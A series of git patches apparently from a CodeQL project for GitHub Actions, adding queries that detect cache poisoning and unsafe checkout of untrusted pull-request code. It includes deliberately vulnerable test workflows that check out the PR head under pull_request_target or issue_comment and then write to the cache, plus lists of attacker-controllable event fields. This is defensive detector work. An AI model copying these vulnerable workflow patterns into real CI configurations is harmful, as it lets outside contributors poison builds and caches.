poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref deleted file mode 100644 index b0c41e712e5..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckout.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected new file mode 100644 index 00000000000..ff65e165812 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected @@ -0,0 +1,6 @@ +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref new file mode 100644 index 00000000000..1192fcfe616 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected similarity index 79% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected index 4913ed2d100..628234f7e8b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected @@ -1,6 +1,4 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,10 +16,6 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref new file mode 100644 index 00000000000..8c77a95b48c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutWarning.ql From addedd0e2aa26f630e766ad00b589ff19fd484e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:29:55 +0200 Subject: [PATCH 0230/1267] Comment out unused source --- .../codeql/actions/dataflow/FlowSources.qll | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 6dd9b5d3617..a97dc8405f4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,23 +76,22 @@ private predicate textEvent(string context) { ) } -bindingset[context] -private predicate repoNameEvent(string context) { - exists(string reg | - reg = - [ - // repo name - // Owner: All characters must be either a hyphen (-) or alphanumeric - // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo - ] - | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - +// bindingset[context] +// private predicate repoNameEvent(string context) { +// exists(string reg | +// reg = +// [ +// // repo name +// // Owner: All characters must be either a hyphen (-) or alphanumeric +// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point +// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo +// ] +// | +// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) +// ) +// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | From bb028e41d49899955ebf3e834f4bd126b4a35763 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:10:34 +0200 Subject: [PATCH 0231/1267] Add Cache Poisoning Query --- .../actions/security/CachePoisoningQuery.qll | 55 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 36 ++++++++++++ .../CWE-349/.github/workflows/test1.yml | 22 ++++++++ .../CWE-349/.github/workflows/test2.yml | 17 ++++++ .../CWE-349/.github/workflows/test3.yml | 21 +++++++ .../CWE-349/.github/workflows/test4.yml | 17 ++++++ .../Security/CWE-349/CachePoisoning.expected | 3 + .../Security/CWE-349/CachePoisoning.qlref | 2 + 8 files changed, 173 insertions(+) create mode 100644 ql/lib/codeql/actions/security/CachePoisoningQuery.qll create mode 100644 ql/src/Security/CWE-349/CachePoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll new file mode 100644 index 00000000000..a9a28227957 --- /dev/null +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -0,0 +1,55 @@ +import actions + +abstract class CacheWritingStep extends Step { } + +class CacheActionUsesStep extends CacheWritingStep, UsesStep { + CacheActionUsesStep() { this.getCallee() = "actions/cache" } +} + +class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { + CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } +} + +class SetupJavaUsesStep extends CacheWritingStep, UsesStep { + SetupJavaUsesStep() { + this.getCallee() = "actions/setup-java" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupGoUsesStep extends CacheWritingStep, UsesStep { + SetupGoUsesStep() { this.getCallee() = "actions/setup-go" } +} + +class SetupNodeUsesStep extends CacheWritingStep, UsesStep { + SetupNodeUsesStep() { + this.getCallee() = "actions/setup-node" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupPythonUsesStep extends CacheWritingStep, UsesStep { + SetupPythonUsesStep() { + this.getCallee() = "actions/setup-python" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} + +class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { + SetupDotnetUsesStep() { + this.getCallee() = "actions/setup-dotnet" and + ( + exists(this.getArgument("cache")) or + exists(this.getArgument("cache-dependency-path")) + ) + } +} diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql new file mode 100644 index 00000000000..b3a9267703f --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -0,0 +1,36 @@ +/** + * @name Cache Poisoning + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/cache-poisoning + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery + +from Workflow w, PRHeadCheckoutStep checkout, LocalJob j +where + // TODO: (require to collect trigger types) + // - add push to default branch? + // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch + w.hasTriggerEvent([ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ]) and + // Workflow is privileged + w.isPrivileged() and + // The workflow checkouts untrusted code from a pull request + j = w.getAJob() and + j.getAStep() = checkout and + // The checkout step is followed by a cache writing step + j.getAStep() instanceof CacheWritingStep +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml new file mode 100644 index 00000000000..75e03886d48 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -0,0 +1,22 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml new file mode 100644 index 00000000000..6a6595d929e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml new file mode 100644 index 00000000000..2c684b6a02d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -0,0 +1,21 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + cache: 'gradle' + cache-dependency-path: | + sub-project/*.gradle* + sub-project/**/gradle-wrapper.properties + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml new file mode 100644 index 00000000000..b5ea127ebd3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected new file mode 100644 index 00000000000..e767e2f8622 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref new file mode 100644 index 00000000000..2cbd05800e6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoning.ql + From 9417e1d164835cf59d9bcb6b73466e43ec58112e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:13:00 +0200 Subject: [PATCH 0232/1267] Classify checkout steps --- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../security/UntrustedCheckoutQuery.qll | 23 +++++++--- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 ------------------- .../CWE-829/UntrustedCheckoutError.md | 0 .../CWE-829/UntrustedCheckoutWarning.md | 0 5 files changed, 19 insertions(+), 52 deletions(-) delete mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a97dc8405f4..580fb1d25ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -113,8 +113,8 @@ private predicate branchEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -146,6 +146,7 @@ private predicate emailEvent(string context) { "github\\.event\\.head_commit\\.committer\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] @@ -165,6 +166,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.head_commit\\.committer\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c677915f504..10a45830324 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -40,6 +40,8 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" ], _, _) @@ -56,6 +58,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars @@ -64,11 +67,17 @@ predicate containsHeadRef(string s) { ) } -/** Checkout of a Pull Request HEAD ref */ +/** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { } +/** Checkout of a Pull Request HEAD ref */ +abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref */ +abstract class SHACheckoutStep extends PRHeadCheckoutStep { } + /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( @@ -102,7 +111,7 @@ class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( @@ -132,7 +141,7 @@ class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -154,7 +163,7 @@ class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -173,7 +182,7 @@ class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -194,7 +203,7 @@ class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md deleted file mode 100644 index 855773e6a31..00000000000 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ /dev/null @@ -1,44 +0,0 @@ -# Unpinned tag for 3rd party Action in workflow - -The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions." - -## Recommendation - -Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. - -## Example - -In this example, the Actions workflow uses an unpinned version. - -```yaml -name: "Unpinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-third-party-mirror/checkout@v3 - - - run: | - ./build.sh -``` - -The Action is pinned in the example below. - -```yaml -name: "Pinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c - - - run: | - ./build.sh -``` - -## References - -- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) -- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md deleted file mode 100644 index e69de29bb2d..00000000000 From 2359e2de90d6a7adafca2ec16dfc849e3e0a7fe7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:24:43 +0200 Subject: [PATCH 0233/1267] Clean query --- ql/src/Security/CWE-349/CachePoisoning.ql | 27 +++++++++---------- .../Security/CWE-349/CachePoisoning.expected | 6 ++--- 2 files changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index b3a9267703f..ac51e58ff4b 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -15,22 +15,21 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery -from Workflow w, PRHeadCheckoutStep checkout, LocalJob j +from LocalJob j where + // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - w.hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", - "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", - "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", - "watch", "workflow_run" - ]) and - // Workflow is privileged - w.isPrivileged() and - // The workflow checkouts untrusted code from a pull request - j = w.getAJob() and - j.getAStep() = checkout and - // The checkout step is followed by a cache writing step + j.getEnclosingWorkflow() + .hasTriggerEvent([ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", + "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", + "project_column", "public", "pull_request_comment", "pull_request_target", + "repository_dispatch", "schedule", "watch", "workflow_run" + ]) and + // The job checkouts untrusted code from a pull request + j.getAStep() instanceof PRHeadCheckoutStep and + // The job writes to the cache j.getAStep() instanceof CacheWritingStep -select checkout, "Potential cache poisoning on privileged workflow." +select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index e767e2f8622..b791a440a6e 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,3 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | From f6b1daa59c7e872797c1486486258d23c7a3f2db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:26:58 +0200 Subject: [PATCH 0234/1267] Improve query --- .../actions/security/CachePoisoningQuery.qll | 11 +++++++++-- ql/src/Security/CWE-349/CachePoisoning.ql | 16 ++++++++++++---- .../CWE-349/.github/workflows/test5.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test6.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test7.yml | 16 ++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 73 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml create 